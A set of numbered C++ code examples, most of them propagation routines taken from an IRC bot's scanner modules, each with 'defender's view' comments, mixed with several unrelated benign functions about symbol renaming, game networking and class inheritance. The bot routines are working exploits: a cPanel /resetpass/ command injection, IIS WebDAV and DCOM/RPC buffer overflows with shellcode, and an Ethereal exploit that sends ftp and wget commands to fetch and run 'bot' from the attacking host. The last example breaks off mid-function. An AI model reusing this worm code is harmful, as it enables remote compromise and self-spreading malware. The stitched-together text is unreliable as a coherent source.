示例#1
// Analysis notes (defender's view) for the propagation routine of the cPanel
// scanner module.
//
// What the visible code does: it sends two HTTP/1.0 GET requests for
// /resetpass/ whose "user" query parameter carries a backtick-quoted shell
// command wrapped in URL-encoded pipes ("%7C%60 ... %60%7C"). The first command
// makes the target fetch a file named "bot" over FTP from the sending host, the
// second one starts it. The technique only works if the server passes the
// "user" parameter to a shell without sanitising it.
//
// Indicators visible in this code: requests for /resetpass/?user= containing
// "%7C%60", the shell variable assignments BLA=... and BLA2=..., "${BLA}" used
// where a space would normally appear, and a subsequent FTP session opened from
// the web server back to the requesting host.
//
// Mitigation: keep the password-reset handler patched, reject shell
// metacharacters in the "user" parameter, and restrict outbound FTP from
// web servers.
//
// Returns bRetVal, which is initialised to false and not reassigned anywhere in
// this function, so every path reports false to the caller.
bool CScannerCPanel::Exploit()
{	bool bRetVal=false; CString sSendBuf, sCmdBuf;
	// Host and port are copied before the first Disconnect() and reused for the
	// second connection below.
	CString sHost(m_sSocket.m_szHost); unsigned short sPort=m_sSocket.m_sPort;

	// Can't infect a host from a firewalled system, cause it needs the FTP server
	if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		return false;

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) return false;
	// Request 1: an "echo -e ... | ftp -n" pipeline in which every space is written
	// as ${BLA}; the FTP script logs in as user "ftp" and downloads "bot" from
	// m_sLocalHost on the configured bot_ftrans_port_ftp port.
	sCmdBuf.Format("echo${BLA}-e${BLA}open${BLA}%s${BLA}%d\\\\nuser${BLA}ftp${BLA}bla\\\\nget${BLA}bot\\\\nquit\\\\n${BLA}|${BLA}ftp${BLA}-n",
		g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
	// The command is embedded between URL-encoded "|`" and "`|" in the user parameter.
	sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr());
	// The response is never read; the request is fire-and-forget.
	m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength());
	m_sSocket.Disconnect();

	// Request 2: same injection point, this time running the downloaded file.
	if(!m_sSocket.Connect(sHost.CStr(), sPort)) return false;
	sCmdBuf.Assign("./bot");
	sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr());
	m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength());
	m_sSocket.Disconnect();

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); return bRetVal;
}
示例#2
// Analysis notes (defender's view) for the WebDAV propagation routine of the
// HTTP scanner module.
//
// What the visible code does: it builds one HTTP request in a 100000-byte heap
// buffer and sends it to TCP port 80 of the target. The request line is
// "SEARCH /" followed by a URI that is padded to roughly 64 KB: a repeated
// 2-byte value (sRet), then 0x90 filler, then the bytes of `jumpcode`. The
// headers announce a text/xml body; the body is `body` followed by a marker
// byte, filler and the contents of szSCBuf.
//
// Indicators visible in this code: a SEARCH request whose request line is tens
// of kilobytes long, long runs of 0x90 in the URI and after the XML body, and an
// embedded "ftp://...@<host>:<port>/bot.exe" URL.
//
// Mitigation: patch the web server, disable WebDAV where it is not needed, and
// enforce a URL length limit in front of the server.
//
// Parameters:
//   iHTTPType - not referenced in this function.
//   sRet      - 2-byte value repeated through the first part of the URI.
// Returns false when the connection or the send fails, true otherwise; the
// server's reply is read but not inspected.
bool CScannerHTTP::ExploitIISWebDav(int iHTTPType, unsigned short sRet) {
	char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000);
	unsigned short ret=sRet; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0;

	CString sURL;

	// Pick the address the target should download from: the externally visible
	// host name when this machine has a private IP and the target does not,
	// otherwise the local address.
	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	// setup_shellcode_udtf is defined elsewhere; presumably it writes a payload
	// that downloads sURL into szShellBuf and returns its length - confirm there.
	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
	
	// Build a buffer with the shellcode
	memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
	memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
	iSCSize=iPos; iPos=0;

	// Build the request
	memset(szReqBuf, 0, 100000);
	strcpy(szReqBuf, "SEARCH /");
	unsigned int j, i=strlen(szReqBuf); szReqBuf[i]='\x90';
	for(j=i+1; j<i+2150; j+=2) { *(unsigned short*)&szReqBuf[j]=(unsigned short)ret; } // EIP will be szReqBuf[8+2087]
	for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone!
	memcpy(&szReqBuf[j], jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request

	// Everything below is appended with strlen(), so the buffer is treated as a
	// C string from here on.
	strcpy(szReqBuf+strlen(szReqBuf), " HTTP/1.1\r\n");
	sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize);
	strcpy(szReqBuf+strlen(szReqBuf), body);
	memset(szReqBuf+strlen(szReqBuf), 0x01, 1);
	memset(szReqBuf+strlen(szReqBuf), 0x90, 3);
	strcpy(szReqBuf+strlen(szReqBuf), szSCBuf);
	iReqSize=strlen(szReqBuf);
	
	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit
	{	free(szReqBuf); return false; }

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; }
	// Read reply
	// NOTE(review): szReqBuf is a char*, so sizeof(szReqBuf) is the size of a
	// pointer, not of the 100000-byte allocation.
	m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000);

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); free(szReqBuf); return true; }
示例#3
// Analysis notes (defender's view) for the propagation routine of the WebDAV
// scanner module.
//
// What the visible code does: it builds one HTTP request in a 100000-byte heap
// buffer and sends it to TCP port 80 of the target. The request line is
// "SEARCH /" followed by a URI padded to roughly 64 KB (a hard-coded 2-byte
// value repeated, then 0x90 filler, then `jumpcode`); the text/xml body is
// followed by a marker byte, filler and the payload buffer szSCBuf.
//
// Indicators visible in this code: a SEARCH request with a request line of tens
// of kilobytes and long runs of 0x90 both in the URI and after the XML body.
//
// Mitigation: patch the web server, disable WebDAV where it is not needed, and
// enforce a URL length limit in front of the server.
//
// Returns false when the connection or the send fails, true otherwise; the
// server's reply is read but not inspected.
bool CScannerWebDav::Exploit()
{	char szSCBuf[4096]; char szShellBuf[4096];
	char *szReqBuf=(char*)malloc(100000); unsigned short ret=0xB102;
	int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0;

	// setup_shellcode is defined elsewhere; from the arguments it presumably
	// copies webdav_shellcode into szShellBuf and patches a port and an IP address
	// at the two given offsets - confirm there. The address passed is the
	// externally visible host when this machine has a private IP and the target
	// does not, otherwise the local address.
	if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		iShellSize=setup_shellcode(webdav_shellcode, sizeof(webdav_shellcode), szShellBuf, sizeof(szShellBuf), \
			g_pMainCtrl->m_cBot.bot_ftrans_port.iValue, inet_addr(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()), \
			WEBDAV_SHELLCODE_OFFSET_PORT, WEBDAV_SHELLCODE_OFFSET_IP, WebDavConfigSC);
	else
		iShellSize=setup_shellcode(webdav_shellcode, sizeof(webdav_shellcode), szShellBuf, sizeof(szShellBuf), \
			g_pMainCtrl->m_cBot.bot_ftrans_port.iValue, g_pMainCtrl->m_cIRC.m_lLocalAddr, \
			WEBDAV_SHELLCODE_OFFSET_PORT, WEBDAV_SHELLCODE_OFFSET_IP, WebDavConfigSC);
	
	// Build a buffer with the shellcode
	memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
	memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
	iSCSize=iPos; iPos=0;

	// Build the request
	memset(szReqBuf, 0, 100000);
	strcpy(szReqBuf, "SEARCH /");
	int j, i=strlen(szReqBuf); szReqBuf[i]='\x90';
	for(j=i+1; j<i+2150; j+=2) { memcpy(szReqBuf+j, &ret, 2);				iPos+=2; }			// EIP will be buffer[8+2087]
	for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90';										// The rest is padded with NOP's. RET address should point to this zone!
	memcpy(szReqBuf+j, jumpcode, strlen(jumpcode));													// Then we skip the body of the HTTP request

	// Everything below is appended relative to strlen(), so the buffer is treated
	// as a C string from here on.
	strcat(szReqBuf, " HTTP/1.1\r\n");
	sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize);
	strcat(szReqBuf, body);
	memset(szReqBuf+strlen(szReqBuf), 0x01, 1);
	memset(szReqBuf+strlen(szReqBuf), 0x90, 3);
	memcpy(szReqBuf+strlen(szReqBuf), szSCBuf, iSCSize);
	iReqSize=strlen(szReqBuf);
	
	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit
	{	free(szReqBuf); return false; }

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; }
	// Read reply
	// NOTE(review): szReqBuf is a char*, so sizeof(szReqBuf) is the size of a
	// pointer, not of the 100000-byte allocation.
	m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000);

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); free(szReqBuf); return true; }
示例#4
// Analysis notes (defender's view) for the propagation routine of the Ethereal
// scanner module.
//
// What the visible code does: after four calls to ExploitInt() (defined
// elsewhere; the comment below says it spoofs packets, which is why root is
// required), it tries to connect to TCP port 31337 on the target. If that
// connection succeeds it treats the peer as a command shell and writes three
// command lines: an FTP fetch of "bot" from the sending host, a wget fetch of
// the same file, and a chmod followed by the launch of a binary.
//
// Indicators visible in this code: a listener appearing on TCP 31337 on a host
// that runs a packet analyser, followed by an inbound session carrying
// "ftp -n" / "wget ftp://" command lines and an outbound FTP connection.
//
// Mitigation: keep protocol analysers patched, do not run them as root on
// untrusted networks, and filter outbound FTP from monitoring hosts.
//
// Returns true only when the connection to port 31337 succeeded; the replies to
// the commands are read but not inspected.
bool CScannerEthereal::Exploit() {
	// Skip private targets when this machine itself has a public address.
	if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;

	// We need root to exploit this cause we need to spoof packets
	if(getuid()) return false;

	ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
	
	CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
		// Read whatever the peer sends first (up to 8192 bytes, timeout 2000 -
		// presumably milliseconds); the data is overwritten by the next Format().
		CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
		sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sShellSocket.Disconnect(); return true; } else return false; }
// Builds the "Impact:..." rename command for the entity behind pSym.
//
// The command has the shape "<verb> <selection> {<newname>}"; fields also get
// a trailing permission code ("0" public, "2" protected, "3" private, "1"
// when none of the three predicates matches). Symbol kinds without a case
// below yield an empty string.
//
// NOTE(review): newname is placed between braces without any escaping, so a
// name containing '}' or other characters special to whatever parses this
// command would change how the command is read. The consumer is not visible
// here - confirm that callers validate newname as an identifier.
string CEntityInfo::getRenameCommand(symbolPtr* pSym,string newname) {
    const string selectTag = prepareQuery(etag(pSym));

    // Same predicate order as before: public wins, then protected, then private.
    string permissionCode = "1";
    if (IsPublic(pSym)) {
        permissionCode = "0";
    } else if (IsProtected(pSym)) {
        permissionCode = "2";
    } else if (IsPrivate(pSym)) {
        permissionCode = "3";
    }

    // Brace-wrapped new name shared by every verb except RenamePackage.
    const string bracedName = " {" + newname + "}";

    switch (pSym->get_kind()) {
    case DD_MODULE:
        return "Impact:ChangeFilename " + selectTag + bracedName;
    case DD_INTERFACE:
    case DD_CLASS:
        return "Impact:ChangeClassname " + selectTag + bracedName;
    case DD_ENUM:
    case DD_UNION:
        return "Impact:ChangeUnionEnumStructName " + selectTag + bracedName;
    case DD_FIELD:
        // Only fields carry the access level.
        return "Impact:ChangeFieldName " + selectTag + bracedName + " " + permissionCode;
    case DD_FUNC_DECL:
        return "Impact:ChangeFunctionName " + selectTag + bracedName;
    case DD_TYPEDEF:
        return "Impact:ChangeTypedefName " + selectTag + bracedName;
    case DD_MACRO:
        return "Impact:ChangeMacroName " + selectTag + bracedName;
    case DD_TEMPLATE:
        return "Impact:ChangeTemplateName " + selectTag + bracedName;
    case DD_VAR_DECL:
        return "Impact:ChangeVariableName " + selectTag + bracedName;
    case DD_PACKAGE:
        // This verb has a space after the opening brace; kept as is.
        return "Impact:RenamePackage " + selectTag + " { " + newname + "}";
    default:
        return string();
    }
}
示例#6
// Makes at most one outgoing connection attempt to this client.
//
// Picks the known address with the fewest previous attempts whose protocol is
// not already covered by the data or message connection and for which pIO has
// a net IO object, then asks pIO to connect to it. For link-local addresses
// every local interface ID is tried as scope ID.
//
// Returns true when nothing needs to be done right now (local client, retry
// timer not yet expired, no usable address) or when pIO->Connect accepted an
// attempt; returns false when every Connect call failed.
bool C4Network2Client::DoConnectAttempt(C4Network2IO *pIO)
{
	// The local client never needs a connection.
	if (isLocal())
	{
		iNextConnAttempt = 0;
		return true;
	}
	// Message and data connection differ: nothing to do, look again in 10 seconds.
	if (getMsgConn() != getDataConn())
	{
		iNextConnAttempt = time(nullptr) + 10;
		return true;
	}
	// Retry timer still running.
	if (iNextConnAttempt && time(nullptr) < iNextConnAttempt)
		return true;

	// Select the least-tried address that can still add a new protocol.
	int32_t iCandidate = -1;
	for (int32_t iAddr = 0; iAddr < iAddrCnt; iAddr++)
	{
		// Protocol already served by the data connection?
		if (pDataConn && Addr[iAddr].getProtocol() == pDataConn->getProtocol())
			continue;
		// Protocol already served by the message connection?
		if (pMsgConn && Addr[iAddr].getProtocol() == pMsgConn->getProtocol())
			continue;
		// No IO object for this protocol?
		if (!pIO->getNetIO(Addr[iAddr].getProtocol()))
			continue;
		if (iCandidate < 0 || AddrAttempts[iAddr] < AddrAttempts[iCandidate])
			iCandidate = iAddr;
	}

	// Nothing usable, or the best address has been tried too often.
	if (iCandidate < 0 || AddrAttempts[iCandidate] > C4NetClientConnectAttempts)
	{
		iNextConnAttempt = time(nullptr) + 10;
		return true;
	}

	// Record the attempt and schedule the next one.
	++AddrAttempts[iCandidate];
	iNextConnAttempt = time(nullptr) + C4NetClientConnectInterval;
	auto addr = Addr[iCandidate].getAddr();

	// TCP simultaneous open is requested only for a global-unicast IPv6 TCP
	// address, when no earlier request exists, and only by the client of the
	// pair with the lower ID so that exactly one side initiates.
	if (addr.GetFamily() == C4NetIO::addr_t::IPv6 &&
	    !addr.IsLocal() && !addr.IsPrivate() &&
	    Addr[iCandidate].getProtocol() == P_TCP &&
	    !TcpSimOpenSocket &&
	    pParent->GetLocal()->getID() < getID())
	{
		DoTCPSimultaneousOpen(pIO, C4Network2Address());
	}

	// Link-local addresses need a scope ID, so try each local interface;
	// everything else uses scope 0.
	std::set<int> scopeIds;
	if (!addr.IsLocal())
	{
		scopeIds = {0};
	}
	else
	{
		scopeIds = Network.Clients.GetLocal()->getInterfaceIDs();
	}

	for (auto scopeId : scopeIds)
	{
		addr.SetScopeId(scopeId);
		LogSilentF("Network: connecting client %s on %s...", getName(), addr.ToString().getData());
		const bool fStarted = pIO->Connect(addr, Addr[iCandidate].getProtocol(), pClient->getCore());
		if (fStarted)
			return true;
	}
	return false;
}
// Reports whether the function at `index` is inherited by a derived class
// that uses the inheritance mode `inherit`.
//
// *access is always set: first to the function's own access level, then, for
// inherited functions, narrowed according to `inherit` (private inheritance
// turns public/protected into private, protected inheritance turns public
// into protected; the Qt slot levels are mapped the same way).
//
// Returns kJFalse for private functions, destructors (name starts with '~')
// and constructors (name equals the class name); kJTrue otherwise.
JBoolean
CBCClass::IsInherited
	(
	const JIndex		index,
	const InheritType	inherit,
	FnAccessLevel*		access
	)
	const
{
	const JString& fnName = GetFunctionName(index);
	*access               = GetFnAccessLevel(index);

	// Private members, destructors and constructors are never inherited.
	if (IsPrivate(*access) ||
		fnName.GetFirstCharacter() == '~' ||
		fnName == GetName())
		{
		return kJFalse;
		}

	if (inherit == kInheritPrivate)
		{
		// Everything visible becomes private in the derived class.
		if (*access == kPublicAccess || *access == kProtectedAccess)
			{
			*access = kPrivateAccess;
			}
		else if (*access == kQtPublicSlotAccess || *access == kQtProtectedSlotAccess)
			{
			*access = kQtPrivateSlotAccess;
			}
		}
	else if (inherit == kInheritProtected)
		{
		// Only the public levels are narrowed; the rest stay unchanged.
		if (*access == kPublicAccess)
			{
			*access = kProtectedAccess;
			}
		else if (*access == kQtPublicSlotAccess)
			{
			*access = kQtProtectedSlotAccess;
			}
		}

	return kJTrue;
}
// A symbol counts as public when it is neither protected nor private.
// IsProtected is checked first; IsPrivate is only consulted when it fails.
bool CEntityInfo::IsPublic(symbolPtr* pSym) {
    if (IsProtected(pSym)) {
        return false;
    }
    return !IsPrivate(pSym);
}
示例#9
// Analysis notes (defender's view) for the propagation routine of the second
// DCOM scanner module.
//
// What the visible code does: it fingerprints the target over RPC, gives up on
// unknown or NT hosts, assembles a DCE/RPC request from four static templates
// (dcom2_request1..4) with a payload buffer spliced in between, patches ten
// length fields at fixed offsets, and sends it after a bind exchange.
//
// Indicators visible in this code: a DCE/RPC bind answered by a BINDACK,
// directly followed by one request whose size fields were enlarged to hold the
// embedded buffer. The payload written last into that buffer is
// dcom2_shellcode_adduser; the name suggests account creation on the target -
// confirm against the definition before relying on that as a host indicator.
//
// Mitigation: patch the RPC/DCOM service and do not expose RPC endpoint ports
// to untrusted networks.
//
// Returns true when the request was sent and the reply was not a DCE fault;
// false on any fingerprint, connect, send or receive failure.
bool CScannerDCOM2::Exploit()
{	char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
	int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
	char *pTemp;
	int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
	if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;

	CString sURL;

	// Download URL: externally visible host name when this machine has a private
	// IP and the target does not, otherwise the local address.
	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	// szShellBuf and iShellSize are filled here but not referenced again in this
	// function.
	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);

	iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
	
	// Payload buffer: start from the static template, then write at fixed offsets.
	// The second write at DCOM2_SCBUF_OFFSET_SC goes to the same offset as the
	// first, so dcom2_shellcode_adduser overwrites the start of the loader bytes.
	memcpy(szLoadBuf+iPos,							dcom2_shellcode_buf,	sizeof(dcom2_shellcode_buf)		); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szLoaderBuf,			iLoaderSize						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser)	);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR,	&dcom2_my_offsets[0].lJmpAddr,	4						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, 	&dcom2_my_offsets[0].lTopSEH,	4						);
	iLoadSize=iPos; iPos=0;

	// Build the request
	memcpy(szReqBuf+iPos,	dcom2_request1,		sizeof(dcom2_request1)-1	); iPos+=sizeof(dcom2_request1)-1;
	memcpy(szReqBuf+iPos,	dcom2_request2,		sizeof(dcom2_request2)-1	); iPos+=sizeof(dcom2_request2)-1;
	memcpy(szReqBuf+iPos,	szLoadBuf,			iLoadSize					); iPos+=iLoadSize;
	memcpy(szReqBuf+iPos,	dcom2_request3,		sizeof(dcom2_request3)-1	); iPos+=sizeof(dcom2_request3)-1;
	memcpy(szReqBuf+iPos,	dcom2_request4,		sizeof(dcom2_request4)-1	); iPos+=sizeof(dcom2_request4)-1;
	iReqSize=iPos; iPos=0;

	// The templates carry length fields for an empty payload; each one is
	// increased by an amount derived from iLoadSize. The first two fields sit
	// right after dcom2_request1, the remaining eight are relative to the start
	// of the request.
	pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
	*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iLoadSize / 2;
	*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize / 2; pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iLoadSize - 12;

    char szAssocGroup[4];

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
		return false;

	// Send the bind string
	if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_BINDACK
	if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
	// Store the association group for later usage
	// (szAssocGroup is not read again within this function.)
    memcpy(szAssocGroup, szRecvBuf+20, 4);

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_FAULT
	if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); return true;
}
示例#10
// Analysis notes (defender's view) for the propagation routine of the DCOM
// scanner module.
//
// What the visible code does: depending on the port the scanner was given, it
// delivers the same DCE/RPC request over two transports.
//   - Ports 135 and 1025: plain TCP - bind, then the request.
//   - Port 445 (Windows builds only): a null session to the target, then the
//     named pipe \\<host>\pipe\epmapper, with the bind sent through
//     TransactNamedPipe and the request through WriteFile.
// The request is assembled from four static templates (request1..4) around a
// payload buffer that embeds an "ftp://...@<host>:<port>/bot.exe" URL, and ten
// length fields are patched at fixed offsets.
//
// Indicators visible in this code: OS fingerprinting probes (FpHost) followed
// by an RPC bind and a single oversized request on 135/1025; on 445 an
// anonymous session that opens the epmapper pipe; long runs of 0x90 inside the
// request; an FTP download of bot.exe initiated by the target afterwards.
//
// Mitigation: patch the RPC/DCOM service, filter ports 135, 445 and 1025 from
// untrusted networks, and restrict anonymous access to named pipes.
//
// Returns true when the request was delivered (TCP branch: a reply was also
// received; pipe branch: the final ReadFile failed); false otherwise, including
// for any other port and for port 445 on non-Windows builds.
bool CScannerDCOM::Exploit()
{
	switch(m_sSocket.m_sPort)
	{
	case 135:
	case 1025:
		{
			char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
			int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
			// Fingerprint over RPC first, fall back to SMB; NT hosts are skipped.
			char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
			if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
			if(iHostOS==OS_WINNT) return false;
			
			CString sURL;

			// Download URL: externally visible host name when this machine has a
			// private IP and the target does not, otherwise the local address.
			if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
			else
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

			// setup_shellcode_udtf is defined elsewhere; presumably it writes a
			// payload that downloads sURL into szShellBuf - confirm there.
			iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
			

			// Build a buffer with the shellcode
			memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
			memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
			memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
			iSCSize=iPos; iPos=0;

			// Prepend NOPs as long as shellcode doesn't fit RPC packet format
			// (the buffer is rebuilt with one more filler byte per pass until its
			// size is 12 modulo 16; szTemp is allocated and freed without being used)
			while(iSCSize%16!=12)
			{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
				memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
				memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
				memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
				iSCSize=iPos; iPos=0; free(szTemp); }

			// Set the return address
			// (my_offsets[1] for XP or unknown hosts, my_offsets[0] otherwise)
			if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
				memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
			else
				memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

			// Build the request
			memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
			memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
			memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
			memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
			memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
			iReqSize=iPos;

			// The templates carry length fields for an empty payload; each one is
			// increased by an amount derived from iSCSize.
